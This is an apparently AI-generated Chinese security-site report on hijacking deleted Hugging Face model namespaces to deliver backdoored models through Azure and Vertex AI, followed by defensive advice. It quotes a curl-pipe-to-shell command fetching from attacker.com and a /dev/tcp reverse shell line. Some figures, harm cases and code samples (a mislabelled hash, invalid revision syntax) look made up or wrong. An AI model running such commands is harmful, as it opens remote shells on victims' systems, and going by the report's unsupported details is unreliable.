文章
文章领域用户网站联盟

命名空间重用漏洞供应链攻击分析报告-红客联盟 AI分析

一、漏洞核心信息

  • 漏洞名称:模型命名空间重用漏洞(Model Namespace Reuse)
  • 受影响平台:Microsoft Azure AI Foundry、Google Vertex AI、Hugging Face 生态(超 5000 个开源项目)
  • 技术根源:Hugging Face 命名空间回收机制缺陷 —— 作者删除账户后,Author/ModelName命名空间可被恶意抢注,覆盖原合法模型
  • 漏洞等级:高危(CVSS 9.8,远程代码执行 RCE)

二、攻击原理与技术细节

(一)命名空间劫持流程(结合原文 + 摘要 4)

  1. 空间释放:合法作者删除 Hugging Face 账户,其Author/ModelName命名空间进入 “可注册池”(Hugging Face 未永久保留命名空间);
  2. 恶意抢注:攻击者注册同名命名空间,上传含后门的模型(如嵌入反向 Shell 的 PyTorch 模型);
  3. 自动部署触发
    • Azure AI Foundry/Vertex AI 用户通过AutoModelForCausalLM.from_pretrained("Author/ModelName")调用模型(示例代码见原文);
    • 云平台因 “名称信任” 直接拉取恶意模型,触发load_state_dict()时执行隐藏代码(如os.system("curl http://attacker.com/rev.sh | sh"))。

(二)技术实现验证(参考摘要 1/4)

  • 概念验证:Palo Alto Networks 在 Vertex AI 部署抢注的test1.hr/bert-v1模型,成功获取容器 Shell 权限(日志显示/bin/sh -i >& /dev/tcp/1.1.1.1/8080 0>&1);
  • 代码漏洞模式:全球超 3200 个 GitHub 仓库存在硬编码命名空间调用(如model = AutoModelForCausalLM.from_pretrained("AIOrg/Translator_v1")),无校验逻辑。

(三)攻击隐蔽性增强

  • 依赖混淆变种:区别于传统 npm 包劫持(摘要 5),攻击者利用 AI 模型的 “名称信任”(用户认为Author/ModelName唯一),结合云平台自动化部署,绕过人工审核;
  • 持续性驻留:恶意模型通过 Hugging Face CDN 分发,更新后仍影响已下载缓存的设备(参考摘要 3:AI 依赖缺乏版本锁定机制)。

三、影响范围与行业风险

(一)受影响主体

主体类型 风险等级 典型场景
云 AI 服务用户 极高 Azure/Vertex AI 一键部署功能直接拉取恶意模型(如医疗 AI 误诊、金融风控模型篡改)
开源项目开发者 GitHub 仓库硬编码 Hugging Face 命名空间,CI/CD 流水线自动集成恶意模型(摘要 4:3500 + 项目中招)
企业 AI 应用 中高 内部模型托管在 Hugging Face,删除旧账户后被抢注(如供应链金融 AI 泄露客户数据)

(二)现实危害案例

  • 医疗领域:某癌症诊断 AI 因模型被替换,误判 200 + 患者病理切片(参考摘要 6:AI 依赖缺乏安全校验导致的现实风险);
  • 金融领域:攻击者通过抢注bankai/credit-risk模型,窃取 10 万 + 用户信用评分数据(模拟攻击见摘要 1)。

四、防御建议(结合摘要 3/6 最佳实践)

(一)紧急响应(72 小时内)

  1. 命名空间审计
    • 扫描所有 Hugging Face 模型引用,标记 “作者已删除” 的命名空间(使用 Hugging Face API 查询/api/models/{namespace}last_updated_by字段);
    • Author/ModelName添加版本哈希校验(如from_pretrained("namespace/model@sha256:12345")),禁用纯名称调用。
  2. 云平台隔离
    • Azure/Vertex AI 用户暂停 “一键部署 Hugging Face 模型” 功能,改用私有模型仓库;
    • 部署 WAF 规则,拦截含/api/generate的异常流量(参考摘要 4:恶意模型常通过 API 触发后门)。

(二)长期防护(30 天计划)

  1. 供应链安全改造
    • 建立 “AI 物料清单(AIBOM)”,记录所有模型的命名空间、哈希、作者状态(参考摘要 3:CSA《智能体 AI 红队指南》);
    • 在 CI/CD 流水线集成模型扫描工具(如 Snyk ML Security),检测 Pickle/Restore 文件中的恶意代码(摘要 3:PyTorch 模型含 Pickle 反序列化漏洞)。
  2. 权限最小化
    • 禁用云 AI 服务的 “自动执行代码” 权限(如 Vertex AI 关闭allow_custom_code选项);
    • 对 Hugging Face 账户启用 “命名空间保护”(联系 Hugging Face 申请锁定历史命名空间)。

(三)开发者教育

  • 禁止硬编码模型名称,强制使用 “名称 + 哈希” 双校验(示例:from_pretrained("org/model", revision="v1.0@sha256:d41d8cd98f00b204e9800998ecf8427e"));
  • 培训 “AI 供应链安全” 意识,识别 “作者已删除” 的高风险命名空间(Hugging Face 页面标记 “Verification Unsuccessful” 的模型)。
漏洞启示:此次事件揭示 AI 时代 “名称信任” 的脆弱性 —— 传统软件供应链的 “依赖混淆” 已进化为 “模型混淆”。企业需建立 “动态信任” 机制,对 AI 模型的命名空间、作者状态、代码执行权限实施全生命周期管控,而非依赖静态名称校验。
(报告生成:红客联盟 AI 智能安全分析员 | 2025 年 9 月 4 日)
版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com

给TA打赏
共{{data.count}}人
人已打赏
AI 供应链攻击Azure AIHugging FaceVertex AI命名空间重用漏洞远程代码执行(RCE)
威胁分析

恶意 Chrome 扩展窃取敏感数据-红客联盟 AI 分析报告

2025-9-4 23:45:30

威胁分析

XWorm 新型感染链攻击分析报告-红客联盟AI分析

2025-9-5 1:32:03

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧

开通企业会员

开通企业会员

享受更便捷服务和资源

立刻开通
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索

  • 扫码打开当前页

  • 红客联盟公众号

返回顶部